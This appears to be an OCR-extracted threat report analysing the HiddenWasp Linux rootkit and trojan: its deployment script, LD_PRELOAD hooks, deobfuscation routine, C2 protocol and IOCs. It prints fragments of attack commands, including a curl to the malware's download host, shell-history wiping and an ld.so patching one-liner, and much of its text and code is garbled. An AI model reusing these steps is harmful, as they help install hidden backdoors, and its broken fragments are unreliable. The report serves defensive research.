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Overview 


e Intezer has discovered a new, sophisticated malware that we have named 
“HiddenWasp’, targeting Linux systems. 


e The malware is still active and has a zero-detection rate in all major anti-virus systems. 


e Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS 
activity. It is a trojan purely used for targeted remote control. 


e Evidence shows in high probability that the malware is used in targeted attacks for 
victims who are already under the attacker’s control, or have gone through a heavy 
reconnaissance. 


e HiddenWasp authors have adopted a large amount of code from various publicly 
available open-source malware, such as Mirai and the Azazel rootkit. In addition, there 
are some similarities between this malware and other Chinese malware families, 
however the attribution is made with low confidence. 


e We have detailed our recommendations for preventing and responding to this 
threat. 


1. Introduction 


Although the Linux threat ecosystem is crowded with loT DDoS botnets and crypto- 
mining malware, it is not very common to spot trojans or backdoors in the wild. 
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Unlike Windows malware, Linux malware authors do not seem to invest too much effort 
writing their implants. In an open-source ecosystem there is a high ratio of publicly 
available code that can be copied and adapted by attackers. 


In addition, Anti-Virus solutions for Linux tend to not be as resilient as in other platforms. 
Therefore, threat actors targeting Linux systems are less concerned about implementing 
excessive evasion techniques since even when reusing extensive amounts of code, 
threats can relatively manage to stay under the radar. 


Nevertheless, malware with strong evasion techniques do exist for the Linux platform. 
There is also a high ratio of publicly available open-source malware that utilize strong 
evasion techniques and can be easily adapted by attackers. 


We believe this fact is alarming for the security community since many implants today 
have very low detection rates, making these threats difficult to detect and respond to. 


We have discovered further undetected Linux malware that appear to be enforcing 
advanced evasion techniques with the use of rootkits to leverage trojan-based implants. 


In this blog we will present a technical analysis of each of the different components that 
this new malware, HiddenWasp, is composed of. We will also highlight interesting code- 
reuse connections that we have observed to several open-source malware. 


The following images are screenshots from VirusTotal of the newer undetected malware 
samples discovered: 


© No engines detected this file E oma x +v 


Ofe1248ecab199bee383cef69f2de77d33b26 


718.49 KB 2019-04-04 16:34:01 UTC AO 
9ad1664127b366a4e745b1199c8 


/private/tmp/libse linux 


64bits elf 


© No engines detected this file Cos: ~ v 


d66bbbccd19587e67632585d0ac944e34e4d5fa2 16.3 KB 2019-04-04 16:37:42 UTC AQ 
b9f3bb3f900f517c7bbf518b 


libselinux.so 
64bits elf shared-lib 


2. Technical Analysis 


When we came across these samples we noticed that the majority of their code was 
unique: 
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Suspicious 


Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this 
malware is composed of a user-mode rootkit, a trojan and an initial deployment script. 
We will cover each of the three components in this post, analyzing them and their 
interactions with one another. 


2.1 Initial Deployment Script: 


When we spotted these undetected files in VirusTotal it seemed that among the 
uploaded artifacts there was a bash script along with a trojan implant binary. 


Hos 4p 6 QH 
Basic Properties ) = © í \ 
shell script 6 / 
©—0 
4-04 1 O 
IPARA E kde (= )e/tmp/libse1inux 
| © 


We observed that these files were uploaded to VirusTotal using a path containing the 
name of a Chinese-based forensics company known as Shen Zhou Wang Yun 
Information Technology Co., Ltd. 


Furthermore, the malware implants seem to be hosted in servers from a physical server 
hosting company known as ThinkDream located in Hong Kong. 
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@ 103.206.122.245 thinkdream.com 


Country Hong Kong 

Organization ThinkDream Technology Limited 

ISP Kwai Cheong Rd Kwai Chung Nt Hongkong 
Last Update 2019-05-22T13:40:34.750297 

Hostnames thinkdream.com 

ASN AS135026 


@ 103.206.123.13 thinkdream.com 


Country Hong Kong 

Organization ThinkDream Technology Limited 

ISP Kwai Cheong Rd Kwai Chung Nt Hongkong 
Last Update 2019-05-21T22:54:34.512302 

Hostnames thinkdream.com 

ASN AS135026 


Among the uploaded files, we observed that one of the files was a bash script meant to 
deploy the malware itself into a given compromised system, although it appears to be for 
testing purposes: 


@ No engines detected this file œC m = 


8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4 3.19 KB 2019-04-04 16:37:41 UTC 


a88a6da2bc671b size 1 month ag D 


ssh 
shell 


Thanks to this file we were able to download further artifacts not present in VirusTotal 
related to this campaign. This script will start by defining a set of variables that would be 
used throughout the script. 
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unlink /tmp 
curl http://103.206.123.13:8 
export I_AM_HIDDEN=a 


history -c 

u t HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG 
export HISTFILE=/dev/null 

export HISTSIZE=0 

export HISTFILESIZE=0 


ITPADDR 
PORT= 


grep $TROFILE 
ROFILE= 
PROFILE= 

ATH= 


Among these variables we can spot the credentials of a user named ‘sftp’, including its 
hardcoded password. This user seems to be created as a means to provide initial 
persistence to the compromised system: 


Furthermore, after the system’s user account has been created, the script proceeds to 
clean the system as a means to update older variants if the system was already 
compromised: 
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$KVER ] 


9 $KVER 
F SPIDFILE 


The script will then proceed to download a tar compressed archive from a download 
server according to the architecture of the compromised system. This tarball will contain 
all of the components from the malware, containing the rootkit, the trojan and an initial 
deployment script: 


l http://$IPADDR: $PORT/configUpdate.tar.g 


°l http://$IPADDR: $PORT/configUpdate-32.tar.gz -so /tmp/configUpdate.tar.gz 


i o9/configUpdate.tar.gz -( tmp 

tmp/configUpdate.tar.gz 
tmp/Libselinux 
tmp/Libselinux.a 
tmp/Libselinux.so 

id -u) -ne @ ] 


rf /tmp/lLibselinux.so 
1 -rf /tmp/Libselinux.a 
tmp/Libselinux /tmp/.bast 
tmp/ .bas 


x.so $LIBPATH 
1 $PROFILE 
$TROFILE 
su $LIBPATH 
su $PROFILE 
su $TROFILE 
i $TROFILE 
i $PROFILE 
i $LIBPATH 


After malware components have been installed, the script will then proceed to execute 
the trojan: 
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7? T AM HIDDEN= 
T_AM_HIDDE 
) export LD_PRELOAD=$L 


echo $PROEXE 


t I_AM_HIDDEN 


We can see that the main trojan binary is executed, the rootkit is added to 
LD_PRELOAD path and another series of environment variables are set such as the 
‘| AM_HIDDEN’. We will cover throughout this post what the role of this environment 
variable is. To finalize, the script attempts to install reboot persistence for the trojan 
binary by adding it to /etc/rc.local. 


Within this script we were able to observe that the main implants were downloaded in the 
form of tarballs. As previously mentioned, each tarball contains the main trojan, the 
rootkit and a deployment script for x86 and x86_64 builds accordingly. 


HiddenWasp $ 


HiddenWasp $ 


HiddenWasp $ 


The deployment script has interesting insights of further features that the malware 
implements, such as the introduction of a new environment variable 
‘HIDE_ THIS SHELL: 
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We found some of the environment variables used in a open-source rootkit known as 


Azazel. 
#define HIDE_TERM_VAR "''' + xor("HIDE_THIS_SHELL=please") + '''" 
#define HIDE _TERM_STR "''' + xor("HIDE_THIS SHELL") + '''" 


It seems that this actor changed the default environment variable from Azazel, that one 
being HIDE_THIS_SHELL for |_ AM_HIDDEN. We have based this conclusion on the 
fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest 
of the components of the malware and it seems to be residual remains from Azazel 
original code. 


The majority of the code from the rootkit implants involved in this malware infrastructure 
are noticeably different from the original Azazel project. Winnti Linux variants are also 
known to have reused code from this open-source project. 


2.2 The Rootkit: 
The rootkit is a user-space based rootkit enforced via LD_PRELOAD linux mechanism. 
It is delivered in the form of an ET_DYN stripped ELF binary. 


This shared object has an DT_INIT dynamic entry. The value held by this entry is an 
address that will be executed once the shared object gets loaded by a given process: 
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Within this function we can see that eventually control flow falls into a function in charge 
to resolve a set of dynamic imports, which are the functions it will later hook, alongside 
with decoding a series of strings needed for the rootkit operations. 


We can see that for each string it allocates a new dynamic buffer, it copies the string to it 


to then decode it. 


cs:dword 203820, 1 
esi, 8 

rdi, aUzbUuaw 
copyalloc 

rdi, rax 

esi, 8 


[rbp+name], rax 

rsi, [rbp+name] ; name 
rdi, @FFFFFFFFFFFFFFFFh ; handle 
_dlsym 
cs:__fxstat_ptr, rax 
rdi, [rbp+name] ; ptr 
_free 

esi, @Ah 

rdi, aWtlWsgu 
copyalloc 

rdi, rax 

esi, @Ah 


[rbp+var_98], rax 

rsi, [rbp+var_98] ; name 
rdi, @FFFFFFFFFFFFFFFFh ; handle 
_dlsym 

cs:__fxstat64_ptr, rax 

rdi, [rbp+var_98] ; ptr 
_free 

esi, 8 

rdi, aUzhUuaw 3; “uzH_UUAW 
copyalloc 

rdi, rax 

esi, 8 

=a 
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It seems that the implementation for dynamic import resolution slightly varies in 


comparison to the one used in Azazel rootkit. 


When we wrote the script to simulate the cipher that implements the string decoding 
function we observed the following algorithm: 


We recognized that a similar 
algorithm to the one above was 
used in the past by Mirai, implying 
that authors behind this rootkit may 
have ported and modified some 


code from Mirai. 


` static char *deobf(char *str, int *len) 


{ 
int i; 
char *cpy; 
*len = util_strlen(str); 
cpy = malloc(*len + 1); 
util_memcpy(cpy, str, *len + 1); 
for (i = 0; i < *len; i++) 
{ 
cpy[i] ^= OxDE; 
cpy[i] “= OxAD; 
cpy[i] ^= 9xBE; 
cpy[i] ^= OxEF; 
} 
return cpy; 
} 


After the rootkit main object has been loaded into the address space of a given process 
and has decrypted its strings, it will export the functions that are intended to be hooked. 


We can see these exports to be the following: 
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is_rootkit_environment_variable_is_set 


stat64+10 
unlink+C 
unlinkat+12 


is_rootkit_environment_variable_is_set 
is_rootkit_environment_variable_is_set 
is_rootkit_environment_variable_is_set 


p  fopen+10 call is_rootkit_environment_variable_is_set 
. p| fopen64+10 call is_rootkit_environment_variable_is_set 
p readdir+C call is_rootkit_environment_variable_is_set 
. p| readdir64+c call is_rootkit_environment_variable_is_set 
. p| _fxstat+12 call is_rootkit_environment_variable_is_set 
p| __fxstat64+12 call is_rootkit_environment_variable_is_set 
p| _Ixstat+13 call is_rootkit_environment_variable_is_set 
pi _Ixstat64+13 call is_rootkit_environment_variable_is_set 
p| _xstat+13 call is_rootkit_environment_variable_is_set 
pi _xstat64+13 call is_rootkit_environment_variable_is_set 
. p| fstat+F call is_rootkit_environment_variable_is_set 
p| fstat64+F call is_rootkit_environment_variable_is_set 
pf Istat+10 call is_rootkit_environment_variable_is_set 
pf Istat6é4+10 call is_rootkit_environment_variable_is_set 
pf stat+34 call is_rootkit_environment_variable_is_set 
p call 
p call 
p call 


For every given export, the rootkit will hook and implement a specific operation 
accordingly, although they all have a similar layout. Before the original hooked function is 
called, it is checked whether the environment variable ‘|_AM_HIDDEN’ is set: 
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3 _ int64 _ cdecl is_rootkit_environment_variable_is_ set(int) 
is_rootkit_environment_variable_is_set proc near 


var_14= dword ptr -14h 
var_8= qword ptr -8 


; __unwind { 


push rbp 

mov rbp, rsp 

sub rsp, 2@h 

mov eax, cs:is_I AM_HIDDEN_set 
cmp eax, @FFFFFFFFh 

jz short loc_201E 


loc_2@1E: 
edi, 1 
return_rootkit_string_by_index 


rdi, rax 3 I_AM_HIDDEN 
_getenv 

[rbpt+var_8], rax 

[rbptvar_8], © 

short loc_2047 


mov cs:is_I_AM_HIDDEN_set, @FFFFFFFFh 
short loc_2@51 
cs:is_I AM HIDDEN set, @ 


[rbp+var_14], eax 
short loc_205A 


eax, [rbp+var_14] 


3; } // starts at 2000 
is_rootkit_environment_variable is set endp 


We can see an example of how the rootkit hooks the function fopen in the following 
screenshot: 
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public fopen 
fopen proc near 


var_18= qword ptr -18h 
var_16= qword ptr -10h 
var_8= qword ptr -8 


3 Unwind { 


push rbp 

mov rbp, rsp 

sub rsp, 20h 

mov [rbp+var_8], rdi 

mov [rbp+var_10], rsi 

call is_rootkit_environment_variable_is_set 
test eax, eax 

inz short loc 2491 


rdi, [rbp+var_8] 
hide_rootkit_artifəcts_check_if_rootkit_still_hidden 
eax, cox 

short loc_2471 


rdi, [rbptvar_8] 
is_accesing_proc_net_tcp 
eax, eax 

short loc_2491 


Pre) 

call __errno_location rsi, [rbpłvar_10] 

mov dword ptr [rax], 2 rdi, [rbpłvar_8] 

mov [rbptvar_18], OFFFFFFFFFFFFFFFFh hide_cnc_connection edi, 8 

jmp short loc_24B1 [rbp+var_18], rax return_function_by_ordinal 


short loc_24B1 rdx, rax 
rsi, [rbpłvar_10] 
rdi, [rbp+var_8] 
eax, @ 
rdx ; calling original fopen function 


[rbpłvar_18], rax 


PME 


We have observed that after checking whether the ‘IL_AM_HIDDEN’ environment variable 
is set, it then runs a function to hide all the rootkits’ and trojans’ artifacts. In addition, 
specifically to the fopen function it will also check whether the file to open is 
‘/proc/net/tcp’ and if it is it will attempt to hide the malware’s connection to the cnc by 
scanning every entry for the destination or source ports used to communicate with the 
cnc, in this case 61061. This is also the default port in Azazel rootkit. 
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[rsp+ece@h+var_CA8], rax 
rax, [rbp+var_830] 
[rsp+8cE@h+var_CB@], rax 
rax, [rbp+var_828] 
[rsp+ece@h+var_CB8], rax 
rax, [rbp+var_850] 
[rsp+8cE@h+var_CC@], rax 
rax, [rbp+var_818] 
[rsp+ece@h+var_Cc8], rax 
rax, [rbp+var_820] 
[rsp+8CcE@h+var_CD@], rax 
rax, [rbp+var_8438] 
[rsp+@CE@h+var_CD8], rax 
rax, [rbp+local_tcp port] 
[rsp+OcE@h+var_CE@], rax 
r9, rdx 

r8, rcx 

rcx, rdi 

rdx, r10 

rdi, r11 

eax, © 

_sscanf 

eax, [rbp+local_tcp_port] 
eax, 

short loc 23E8 


rbptremote_tcp_port] 
cmp eax, 
jz short loc_23E8 


mov rsi, [rbptstream] ; stream 
lea rdi, [rbp+s] 3s 
call _fputs 


Te 


_ jE 
mov rdi, [rbp+fd] ; stream 
call _fclose 

Rl. AF imav rdi. [rhnéstream] : stream 


The rootkit primarily implements artifact hiding mechanisms as well as tcp connection 
hiding as previously mentioned. Overall functionality of the rootkit can be illustrated in 
the following diagram: 
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Per-process 
ePeeweaeeneweweewewenenenenweneneeneneneneeeneweneeneeaeee & “ 
I i 
' Decrypt strings and 
resolve dynamic On load time i 
r imports i 
i i 
i i 
ey Pe PERE PTEN CT ee TE eee PEENE eae eT en eT 1 
I | 
' On export call i 
I 
i i 
I i 
I i 

: n Execute some 
I [] 
i = rootkit arbitrary code i 
environment — 

' variable set relevant for the ' 
' export called i 
I 

i i 
I i 
I i] 
I i 
I i 
I i] 
I i 
I i 
I i 
; Execute original 
r function i 
I i 
aaa we ee a ay me 

2.3 The Trojan: 


The trojan comes in the form of a statically linked ELF binary linked with stdlibc++. We 
noticed that the trojan has code connections with ChinaZ’s Elknot implant in regards to 
some common MD5 implementation in one of the statically linked libraries it was linked 


with: 
HiddenWasp 
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In addition, we also see a high rate of shared strings with other known ChinaZ malware, 
reinforcing the possibility that actors behind HiddenWasp may have integrated and 
modified some MD5 implementation from Elknot that could have been shared in Chinese 
hacking forums: 


ast 


Malware 


When we analyze the main we noticed that the first action the trojan takes is to retrieve 
its configuration: 
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d ptr -148h 
rd ptr -13Ch 


rker ptr -120h 
is p -0COh 
d ptr -8ih 
e ptr -80h 
e ptr -60h 
e ptr -40h 


+optval] ; this 
a | ; Json: :ValueType 
_ZN4Json5ValueCiENS_9ValueTypeE 
' +argv] 
] ; filepath 
> +optval] ; value 
_Z10GetOptionsPcRN4Json5ValueE 
Ao | +optval] ; this 
_ZNK4Json5Value6isNullEv 


short loc_413987 


+user], 
+user], 


The malware configuration is appended at the end of the file and has the following 
structure: 


-o i —— Encrypted Configuration 


= Magic Values 


The malware will try to load itself from the disk and parse this blob to then retrieve the 
static encrypted configuration. 
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Once encryption configuration has been successfully retrieved the configuration will be 
decoded and then parsed as json. 


The cipher used to encode and decode the configuration is the following: 
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\xb2", 


network communication protocol between trojan clients and their CNCs. 


After the configuration is decoded the following json will be retrieved: 


Libselinux64. conf+ 


l 
J 
1 


a 


Moreover, if the file is running as root, the malware will attempt to change the default 


| 

DONELI 2s os 

Le 2-104: 2060.123. 137. 
'Port" :6106: 


tandby": { 


‘Domain":"", 
TR STOS ZOO War ae bee 
‘Port" :61061 


location of the dynamic linker’s LD_PRELOAD path. This location is usually at 


/etc/ld.so.preload, however there is always a possibility to patch the dynamic linker 
binary to change this path: 
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Patch_Id function will scan for any existent /lib paths. The scanned paths are the 
following: 


aLibx86_64Linux 
aLibI386LinuxGn 


aLib32 
aLibx32 
aLib64 


The malware will attempt to find the dynamic linker binary within these paths. The 
dynamic linker filename is usually prefixed with Id-<version number>. 
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r 


loc_41FA96: loc_41FBB7: 

mov rax rbp ] mov rdi, [zx 
add "ax call _closed 
mov : 

mov 

mov 

cld 

mov 

mov 

mov 

repe cmpsb 

setnbe dl 

setb ] 

mov 

sub 

mov 

movsx 

test 

jnz loc_41FB99 


loc_41FBCO: 


add [rbp i> 


Once the dynamic linker is located, the malware will find the offset where the 
/etc/ld.so.preload string is located within the binary and will overwrite it with the path of 
the new target preload path, that one being /sbin/.ifup-local. 


; char *NEW_PRELOAD 
NEW_PRELOAD dq offset aSbin_ifupLoc_0 


; void *LIB_PRELOAD 
LIB_PRELOAD dq offset aLibLibselinu_0 


_data 


To achieve this patching it will execute the following formatted string by using the xxd 
hex editor utility by previously having encoded the path of the rootkit in hex: 


; char aHexdumpVel1i_2x[] 
aHexdumpVel1_2x db 'hexdump -ve ',27h,'1/1 "%%.2X"', ,' %s | sed "s/%s/ts/g" | xxd -r -p ' 


db '> %s.tmp’, OAh 


Once it has changed the default LD_PRELOAD path from the dynamic linker it will 
deploy a thread to enforce that the rootkit is successfully installed using the new 
LD_PRELOAD path. In addition, the trojan will communicate with the rootkit via the 
environment variable ‘|_AM_HIDDEN’ to serialize the trojan’s session for the rootkit to 
apply evasion mechanisms on any other sessions. 
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After seeing the rootkit’s functionality, we can understand that the rootkit and trojan work 
together in order to help each other to remain persistent in the system, having the rootkit 
attempting to hide the trojan and the trojan enforcing the rootkit to remain operational. 
The following diagram illustrates this relationship: 


Deployment Script 


Assures custom ' sarahe Checks if environment 
LD_PRELOAD to enforce : : variable is not set in current 
rootkit installation and session to carry out 
5 ' 
serializes Trojan session 4 ong oe ey hooking activities to hide 
by setting environment Trojan in foreign sessions 


Vi 


Continuing with the execution flow of the trojan, a series of functions are executed to 
enforce evasion of some artifacts: 
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These artifacts are the following: 
aProcHjggkfp db 


char aProcHideD[] 
aProcHideD db 
; char aProcUnhideD[] 
aProcUnhideD -I 
char aProcFull 
aProcFullprivs 


char aProcUninstall[] 
aProcUninstall db 


By performing some OSINT regarding these artifact names, we found that they belong to 
a Chinese open-source rootkit for Linux known as Adore-ng hosted in GitHub: 


int adore_makeroot(adore_t *a) make visible again * 
{ int adore_unhideproc(adore_t *a, pid_t pid) 
now already handled by adore_init() * { 
close(open(APREFIX"/fullociys"., O_RDWR|O_CREAT, 9)); char buf[1024]; 
unlink(APREFIX"/fullprivs"); 
if (geteuid() != 0) if (pid == 0) 
return -1; return -1; 
return 0; sprintf(buf, APREFIX"/unhide-%d", pid); 
} close(open(buf, O-RDWR[O_CREAT, 0)); 
int adore_hideproc(adore_t *a, pid_t pid) unlink (but); 
i return 0; 
char buf[1024]; } 
int adore_uninstall(adore_t *a) 
if (pid == 0) { 
return -1; close(open(APREFIX"/uninstall", O_RDWR|O_CREAT, ©)); 
return 0; ——-- ——* 
sprintf(buf, APREFIX"/hide-%d", pid); } 
close(open(buf, O_RDWR|O_CREAT, 0)); 
unlink(buf); 
return 0; 
} 


The fact that these artifacts are being searched for suggests that potentially targeted 
Linux systems by these implants may have already been compromised with some 
variant of this open-source rootkit as an additional artifact in this malware’s 
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infrastructure. Although those paths are being searched for in order to hide their 
presence in the system, it is important to note that none of the analyzed artifacts related 
to this malware are installed in such paths. 


This finding may imply that the target systems this malware is aiming to intrude may be 
already known compromised targets by the same group or a third party that may be 
collaborating with the same end goal of this particular campaign. 


Moreover, the trojan communicated with a simple network protocol over TCP. We can 
see that when connection is established to the Master or Stand-By servers there is a 
handshake mechanism involved in order to identify the client. 


; this 
; evt 
; timeout 


With the help of this function we where able to understand the structure of the 
communication protocol employed. We can illustrate the structure of this communication 
protocol by looking at a pcap of the initial handshake between the server and client: 
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000009000 
000009004 
0900009014 : 
000009 4 AR A 
00090900 |7563 65 73 P 
000009007 EEE z 
00000900B 
00000901B 
00009002B 
00000903B 
00000904B 
00000905B 
00009006B 
00000907B 
0000909088 
00000909B 
000000AB 
00000908B 
000000CB 
000000DB 
0000090EB 
0000090FB 
0000010B 
00000118B 
00000128B 
09000013B 
00000148B 
00000158B 
00000168B 


— Encrypted — Magic — Reserved —— Method —— Cipher Table 
Payload Offset 


We noticed while analyzing this protocol that the Reserved and Method fields are always 
constant, those being 0 and 1 accordingly. The cipher table offset represents the offset in 
the hardcoded key-stream that the encrypted payload was encoded with. The following 
is the fixed keystream this field makes reference to: 


After decrypting the traffic and analyzing some of the network related functions of the 
trojan, we noticed that the communication protocol is also implemented in json format. To 
show this, the following image is the decrypted handshake packets between the CNC 
and the trojan: 


After the handshake is completed, the trojan will proceed to handle CNC requests: 
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+request] ; this 
6 ; Json: :ValueType 
-ZN4Json5ValueC1ENS_9ValueTypeE 
rl +request] ; json 


ee | +this] ; this 
_ZN6Worker8ReadJsonERN4Json5ValueE 


short loc_41D84D 


"As 


loc_41D84D ; request 
|| +request] 
ral +this] ; this 
_ZN6Worker13HandleRequestERKN4Json5ValueE 
A 


rt loc_41D86A 


[ +var_7C], 0 +var_7C], 0 
short loc_41D89D j short loc_41D89D 
+var_7C], 1 
hort loc_41D89D 


Depending on the given requests the malware will perform different operations 
accordingly. An overview of the trojan’s functionalities performed by request handling are 
shown below: 


_ZN12FileOpration8CopyF 
_ZN12FileOpration1 3NewUploadFileEN4json5ValueER5Param 
eOpration6UploadERSsR5SParam 
ration] 1GetFileDataEN4|son5ValueEj/RSParam 
eOpration 
on12ShowFileListESSR5Param 
ration18BreakPointDownlo 
CopyDirESsSsSs 
ration1 6OrdinaryDownloadEN4Json5ValueEjR5Paran 
tion9RemoveDir 


ration6handleEPKc 


11ORemoveFileESs 
rationClEv 


1N15File2CopyOrMoveEN4json5V 


12FileOpratio 
_ZTV7Command 
_ZN7Command16ExecuteScriptCMDEPKcR5Param 
_ZN7CommandClEv 
_ZN7Command10ExecuteCMDEPKcR5Param 
_ZN7Command11inputScriptERSs 

_ZT1I7Command 

_ZN7Command6handleEPKc 

_ZTS7Command 
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2.3. Prevention and Response 
Prevention: Block Command-and-Control IP addresses detailed in the IOCs section. 


Response: We have provided a YARA rule intended to be run against in-memory 
artifacts in order to be able to detect these implants. 


In addition, in order to check if your system is infected, you can search for “Id.so” files — 
if any of the files do not contain the string ‘/etc/Id.so.preload’, your system may be 
compromised. This is because the trojan implant will attempt to patch instances of Id.so 
in order to enforce the LD_PRELOAD mechanism from arbitrary locations. 


4. Summary 


We analyzed every component of HiddenWasp explaining how the rootkit and trojan 
implants work in parallel with each other in order to enforce persistence in the system. 


We have also covered how the different components of HiddenWasp have adapted 
pieces of code from various open-source projects. Nevertheless, these implants 
managed to remain undetected. 


Linux malware may introduce new challenges for the security community that we have 
not yet seen in other platforms. The fact that this malware manages to stay under the 
radar should be a wake up call for the security industry to allocate greater efforts or 
resources to detect these threats. 


Linux malware will continue to become more complex over time and currently even 
common threats do not have high detection rates, while more sophisticated threats have 
even lower visibility. 


IOCs 


103.206.123[.]13 

103.206.122[.]245 

http://103.206.123[.]13:8080/system.tar.gz 

http://103.206.123[.]13:8080/config Update.tar.gz 
http://103.206.123[.]13:8080/configUpdate-32. tar.gz 
e9e2e84ed423bfic8e82eb434cede5c9568ab44e7al41 0a85e5d5eb24b1 e622e3 
1321685342fa373c33eb94791 76a086a1 c56c90a1 826a0aef3450809ffc01 edd 
d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f8bb3f900f5 1 7c7bbf51 8b 
Ofe1248ecab199bee383cef69f2de77d33b269ad 1664127b366a4e745b1199c8 
2ea291aeb0905c3171 6fe5e39ff1 11724a3c461 e3029830d2bfa77c1 b38656fcO 
d596acc70426a16760a2b2cc78ca2cc65c5a23bb7931 6627c0b2e1 6489bf86c0 
609bbf4ccc2cbOfcbe0d5891 eea7d97a05a0b29431 c468bf3badd83{c441 4578 
8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d 
{88ab11c28e944536e00ca1 4954df5f4d08c1 222811 fef49baded5009bbbc9a2 
891 4fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b 
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